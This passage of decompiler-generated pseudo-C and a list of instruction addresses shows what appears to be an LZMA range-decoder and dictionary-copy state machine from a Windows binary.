											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                            0x00000000
                                            0x00406f5b
                                            0x00406f5b
                                            0x00406f5f
                                            0x00406f84
                                            0x00406f8e
                                            0x00000000
                                            0x00406f61
                                            0x00406f61
                                            0x00406f64
                                            0x00406f68
                                            0x00406f6b
                                            0x00406f6e
                                            0x00406f72
                                            0x00406f72
                                            0x00406f75
                                            0x0040704f
                                            0x0040704f
                                            0x00407056
                                            0x00407056
                                            0x00407059
                                            0x00407060
                                            0x0040708d
                                            0x00407091
                                            0x004070f1
                                            0x004070f4
                                            0x004070f9
                                            0x004070fa
                                            0x004070fc
                                            0x004070fe
                                            0x00407101
                                            0x0040700d
                                            0x0040700d
                                            0x0040700d
                                            0x004067a9
                                            0x004067a9
                                            0x004067a9
                                            0x004067b2
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x00000000
                                            0x004067c3
                                            0x00000000
                                            0x00000000
                                            0x004067cc
                                            0x004067cf
                                            0x004067d2
                                            0x004067d6
                                            0x00000000
                                            0x00000000
                                            0x004067dc
                                            0x004067df
                                            0x004067e1
                                            0x004067e2
                                            0x004067e5
                                            0x004067e7
                                            0x004067e8
                                            0x004067ea
                                            0x004067ed
                                            0x004067f2
                                            0x004067f7
                                            0x00406800
                                            0x00406813
                                            0x00406816
                                            0x00406822
                                            0x0040684a
                                            0x0040684c
                                            0x0040685a
                                            0x0040685a
                                            0x0040685e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040684e
                                            0x0040684e
                                            0x00406851
                                            0x00406852
                                            0x00406852
                                            0x00000000
                                            0x0040684e
                                            0x00406828
                                            0x0040682d
                                            0x0040682d
                                            0x00406836
                                            0x0040683e
                                            0x00406841
                                            0x00000000
                                            0x00406847
                                            0x00406847
                                            0x00000000
                                            0x00406847
                                            0x00000000
                                            0x00406864
                                            0x00406864
                                            0x00406868
                                            0x00407114
                                            0x00000000
                                            0x00407114
                                            0x00406871
                                            0x00406881
                                            0x00406884
                                            0x00406887
                                            0x00406887
                                            0x00406887
                                            0x0040688a
                                            0x0040688e
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406896
                                            0x004068c0
                                            0x004068c6
                                            0x004068cd
                                            0x00000000
                                            0x004068cd
                                            0x0040689c
                                            0x0040689f
                                            0x004068a4
                                            0x004068a4
                                            0x004068af
                                            0x004068b7
                                            0x004068ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x00406905
                                            0x00406908
                                            0x00406915
                                            0x0040691d
                                            0x00000000
                                            0x00000000
                                            0x004068d4
                                            0x004068d4
                                            0x004068d8
                                            0x00407123
                                            0x00000000
                                            0x00407123
                                            0x004068e4
                                            0x004068ef
                                            0x004068ef
                                            0x004068ef
                                            0x004068f2
                                            0x004068f5
                                            0x004068f8
                                            0x004068fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406fe2
                                            0x00406fe6
                                            0x00407195
                                            0x00000000
                                            0x00407195
                                            0x00406ff2
                                            0x00406ff9
                                            0x00407001
                                            0x00407004
                                            0x00407007
                                            0x00407007
                                            0x00000000
                                            0x00000000
                                            0x00406925
                                            0x00406927
                                            0x0040692a
                                            0x0040699b
                                            0x0040699e
                                            0x004069a1
                                            0x004069a8
                                            0x004069b2
                                            0x00000000
                                            0x004069b2
                                            0x0040692c
                                            0x00406930
                                            0x00406933
                                            0x00406935
                                            0x00406938
                                            0x0040693b
                                            0x0040693d
                                            0x00406940
                                            0x00406942
                                            0x00406947
                                            0x0040694a
                                            0x0040694d
                                            0x00406951
                                            0x00406958
                                            0x0040695b
                                            0x00406962
                                            0x00406966
                                            0x0040696e
                                            0x0040696e
                                            0x0040696e
                                            0x00406968
                                            0x00406968
                                            0x00406968
                                            0x0040695d
                                            0x0040695d
                                            0x0040695d
                                            0x00406972
                                            0x00406975
                                            0x00406993
                                            0x00406995
                                            0x00000000
                                            0x00406977
                                            0x00406977
                                            0x0040697a
                                            0x0040697d
                                            0x00406980
                                            0x00406982
                                            0x00406982
                                            0x00406982
                                            0x00406985
                                            0x00406988
                                            0x0040698a
                                            0x0040698b
                                            0x0040698e
                                            0x00000000
                                            0x0040698e
                                            0x00000000
                                            0x00406bc4
                                            0x00406bc8
                                            0x00406be6
                                            0x00406be9
                                            0x00406bf0
                                            0x00406bf3
                                            0x00406bf6
                                            0x00406bf9
                                            0x00406bfc
                                            0x00406bff
                                            0x00406c01
                                            0x00406c08
                                            0x00406c09
                                            0x00406c0b
                                            0x00406c0e
                                            0x00406c11
                                            0x00406c14
                                            0x00406c14
                                            0x00406c19
                                            0x00000000
                                            0x00406c19
                                            0x00406bca
                                            0x00406bcd
                                            0x00406bd0
                                            0x00406bda
                                            0x00000000
                                            0x00000000
                                            0x00406c2e
                                            0x00406c32
                                            0x00406c55
                                            0x00406c58
                                            0x00406c5b
                                            0x00406c65
                                            0x00406c34
                                            0x00406c34
                                            0x00406c37
                                            0x00406c3a
                                            0x00406c3d
                                            0x00406c4a
                                            0x00406c4d
                                            0x00406c4d
                                            0x00000000
                                            0x00000000
                                            0x00406c71
                                            0x00406c75
                                            0x00000000
                                            0x00000000
                                            0x00406c7b
                                            0x00406c7f
                                            0x00000000
                                            0x00000000
                                            0x00406c85
                                            0x00406c87
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8e
                                            0x00406c92
                                            0x00000000
                                            0x00000000
                                            0x00406ce2
                                            0x00406ce6
                                            0x00406ced
                                            0x00406cf0
                                            0x00406cf3
                                            0x00406cfd
                                            0x00000000
                                            0x00406cfd
                                            0x00406ce8
                                            0x00000000
                                            0x00000000
                                            0x00406d09
                                            0x00406d0d
                                            0x00406d14
                                            0x00406d17
                                            0x00406d1a
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d1d
                                            0x00406d20
                                            0x00406d23
                                            0x00406d23
                                            0x00406d26
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d36
                                            0x00406d3b
                                            0x00000000
                                            0x00000000
                                            0x00406dc9
                                            0x00406dc9
                                            0x00406dcd
                                            0x0040716b
                                            0x00000000
                                            0x0040716b
                                            0x00406dd3
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406ddd
                                            0x00406de0
                                            0x00406de6
                                            0x00406de8
                                            0x00406de8
                                            0x00406de8
                                            0x00406deb
                                            0x00406dee
                                            0x00000000
                                            0x00000000
                                            0x004069be
                                            0x004069be
                                            0x004069c2
                                            0x0040712f
                                            0x00000000
                                            0x0040712f
                                            0x004069c8
                                            0x004069cb
                                            0x004069ce
                                            0x004069d2
                                            0x004069d5
                                            0x004069db
                                            0x004069dd
                                            0x004069dd
                                            0x004069dd
                                            0x004069e0
                                            0x004069e3
                                            0x004069e3
                                            0x004069e6
                                            0x004069e9
                                            0x00000000
                                            0x00000000
                                            0x004069ef
                                            0x004069f5
                                            0x00000000
                                            0x00000000
                                            0x004069fb
                                            0x004069fb
                                            0x004069ff
                                            0x00406a02
                                            0x00406a05
                                            0x00406a08
                                            0x00406a0b
                                            0x00406a0c
                                            0x00406a0f
                                            0x00406a11
                                            0x00406a17
                                            0x00406a1a
                                            0x00406a1d
                                            0x00406a20
                                            0x00406a23
                                            0x00406a26
                                            0x00406a29
                                            0x00406a45
                                            0x00406a48
                                            0x00406a4b
                                            0x00406a4e
                                            0x00406a55
                                            0x00406a59
                                            0x00406a5b
                                            0x00406a5f
                                            0x00406a2b
                                            0x00406a2b
                                            0x00406a2f
                                            0x00406a37
                                            0x00406a3c
                                            0x00406a3e
                                            0x00406a40
                                            0x00406a40
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6c
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a72
                                            0x00000000
